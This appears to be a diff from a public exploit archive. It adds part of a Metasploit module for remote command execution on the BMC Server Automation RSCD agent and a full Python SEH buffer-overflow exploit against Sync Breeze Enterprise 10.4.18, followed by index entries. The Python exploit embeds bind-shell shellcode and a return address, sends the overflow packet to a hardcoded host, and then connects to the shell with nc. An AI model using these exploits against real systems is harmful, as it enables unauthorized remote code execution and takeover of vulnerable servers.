+                                     res.split(';').length > 6 &&
+                                     res.length == (res_len + 4)
+
+    # Invalid or unexpected response format, return the complete response
+    [0, res]
+  end
+
+  # Connect to the target and upgrade to an encrypted connection
+  def connect_to_rscd
+    connect
+    sock.put('TLS')
+    sock.extend(Rex::Socket::SslTcp)
+    sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
+    sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
+    sock.sslctx.options = OpenSSL::SSL::OP_ALL
+    sock.sslctx.ciphers = 'ALL'
+    sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
+    sock.sslsock.connect
+  end
+
+  # Send fake agentinfo auth packet and ignore the response
+  def send_fake_agentinfo_auth
+    sock.put("\x00\x00\x00\x5e\x30\x30\x30\x30\x30\x30\x35\x36\x30\x30\x30" \
+             "\x30\x30\x30\x31\x31\x36\x35\x3b\x30\x3b\x33\x35\x3b\x38\x38" \
+             "\x30\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x33\x35" \
+             "\x30\x3b\x30\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x39" \
+             "\x3b\x61\x67\x65\x6e\x74\x69\x6e\x66\x6f\x3b\x2d\x3b\x2d\x3b" \
+             "\x30\x3b\x2d\x3b\x31\x3b\x31\x3b\x37\x3b" + rand_text_alpha(7) +
+             "\x3b\x55\x54\x46\x2d\x38")
+    sock.get_once
+  end
+
+  # Send fake nexec auth packet and ignore the  response
+  def send_fake_nexec_auth
+    sock.put("\x00\x00\x00\x5a\x30\x30\x30\x30\x30\x30\x35\x32\x30\x30\x30" \
+             "\x30\x30\x30\x31\x31\x36\x35\x3b\x30\x3b\x33\x31\x3b\x64\x61" \
+             "\x34\x3b\x64\x61\x34\x3b\x30\x30\x30\x30\x30\x30\x30\x33\x31" \
+             "\x30\x3b\x30\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x35" \
+             "\x3b\x6e\x65\x78\x65\x63\x3b\x2d\x3b\x2d\x3b\x30\x3b\x2d\x3b" \
+             "\x31\x3b\x31\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x55" \
+             "\x54\x46\x2d\x38")
+    sock.get_once
+  end
+
+  # Generate a payload packet
+  def generate_cmd_pkt(command)
+    # Encode back slashes
+    pkt = command.gsub('\\', "\xc1\xdc")
+
+    # Encode double quotes unless powershell is being used
+    pkt = pkt.gsub('"', "\xc2\x68") unless pkt.start_with?('powershell')
+
+    # Construct the body of the payload packet
+    pkt = pad_number(pkt.length + 32) + "\x30\x30\x30\x30\x30\x30\x31\x30" \
+          "\x62\x37\x3b\x30\x3b\x32\x3b\x63\x61\x65\x3b\x64\x61\x34\x3b\x30" +
+          pad_number(pkt.length) + pkt
+
+    # Prefix with the packet length and return
+    [pkt.length].pack('N') + pkt
+  end
+
+  # Convert the given number to a hex string padded to 8 chars
+  def pad_number(num)
+    format('%08x', num)
+  end
+
+  # Read the command output from the server
+  def read_cmd_output
+    all_output = ''
+    response_done = false
+
+    # Read the entire response from the RSCD service
+    while response_done == false
+      # Read a response chunk
+      chunk = sock.get_once
+      next unless chunk && chunk.length > 4
+      chunk_len = chunk[0..3].unpack('N')[0]
+      chunk = chunk[4..chunk.length]
+      chunk += sock.get_once while chunk.length < chunk_len
+
+      # Check for the "end of output" chunk
+      if chunk_len == 18 && chunk.start_with?("\x30\x30\x30\x30\x30\x30\x30" \
+                                              "\x61\x30\x30\x30\x30\x30\x30" \
+                                              "\x30\x32\x78")
+        # Response has completed
+        response_done = true
+      elsif all_output == ''
+        # Keep the first response chunk as-is
+        all_output += chunk
+
+        # If the command failed, we're done
+        response_done = true unless all_output[8..15].to_i(16) != 1
+      else
+        # Append everything but the length fields to the output buffer
+        all_output += chunk[17..chunk.length]
+      end
+    end
+
+    # Return output if response indicated success
+    return [1, all_output[26..all_output.length]] if
+            all_output &&
+            all_output.length > 26 &&
+            all_output[8..15].to_i(16) == 1
+
+    # Return nothing if there isn't enough data for error output
+    return [0, ''] unless all_output && all_output.length > 17
+
+    # Get the length of the error output and return the error
+    err_len = all_output[8..15].to_i(16) - 1
+    [0, all_output[17..17 + err_len]]
+  end
+end

exploits/windows/remote/43936.py

@@ -0,0 +1,89 @@
+# Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH
+# Date: 29/01/2018
+# Exploit Author: Daniel Teixeira
+# Vendor Homepage: http://www.syncbreeze.com
+# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.4.18.exe
+# Version: 10.4.18 
+# Tested on: Windows 7 x86
+
+
+from struct import pack
+from os import system
+from sys import exit
+from time import sleep
+import socket
+
+port = 9121
+host = "172.16.40.148"
+
+# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode 
+shellcode =  ""
+shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"
+shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"
+shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"
+shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"
+shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"
+shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"
+shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"
+shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"
+shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"
+shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"
+shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"
+shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"
+shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"
+shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"
+shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"
+shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"
+shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"
+shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"
+shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"
+shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"
+shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"
+shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"
+shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"
+shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"
+shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"
+shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"
+shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"
+shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"
+shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"
+shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"
+
+payload =  "A" * 124            # offset
+payload += "\x90\x09\xeb\x05"   # jmp over seh retrun value
+payload += "\x1b\x5c\x01\x10"   # 0x10015c1b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Sync Breeze Enterprise\bin\libspp.dll)
+
+payload += "\x90" * 10
+payload += "\x83\xc4\x64" * 20  # metasm > add esp,100
+payload += "\xff\xe4"           # metasm > jmp esp
+payload += "\x90" * (1000 - len(payload) - len(shellcode))
+payload += shellcode
+
+header =  "\x75\x19\xba\xab"
+header += "\x03\x00\x00\x00"
+header += "\x00\x40\x00\x00"
+header += pack('<I', len(payload))
+header += pack('<I', len(payload))
+header += pack('<I', ord(payload[-1]))
+packet = header
+packet += payload 
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+
+    print "[*] Testing connection to tatget %s:%s" %(host,port)
+    s.connect((host, port))
+
+except:
+
+    print "[-] Unable to communicate to target %s:%s" %(host,port)
+
+    exit()
+
+s.send(packet)
+
+print "[*] Payload Sent.."
+print "[*] Connecting to bind shell %s:4444 .." %host
+sleep(5)
+system("nc %s 4444"%host)

files_exploits.csv

@@ -5483,6 +5483,8 @@ id,file,description,date,author,type,platform,port
 43904,exploits/multiple/dos/43904.txt,"Artifex MuJS 1.0.2 - Integer Overflow",2018-01-28,"Andrea Sindoni",dos,multiple,
 43923,exploits/macos/dos/43923.c,"macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding",2018-01-29,"Google Security Research",dos,macos,
 43930,exploits/windows/dos/43930.py,"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow",2018-01-30,"Miguel Mendez Z",dos,windows,
+43937,exploits/multiple/dos/43937.html,"WebKit - 'detachWrapper' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple,
+43938,exploits/multiple/dos/43938.html,"WebKit - 'WebCore::FrameView::clientToLayoutViewportPoint' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple,
 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@@ -15977,6 +15979,8 @@ id,file,description,date,author,type,platform,port
 43920,exploits/linux/remote/43920.py,"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution",2018-01-28,mr_me,remote,linux,
 43924,exploits/multiple/remote/43924.rb,"Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)",2018-01-29,Metasploit,remote,multiple,
 43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows,
+43936,exploits/windows/remote/43936.py,"Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)",2018-02-01,"Daniel Teixeira",remote,windows,
+43939,exploits/multiple/remote/43939.rb,"BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)",2018-02-01,Metasploit,remote,multiple,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22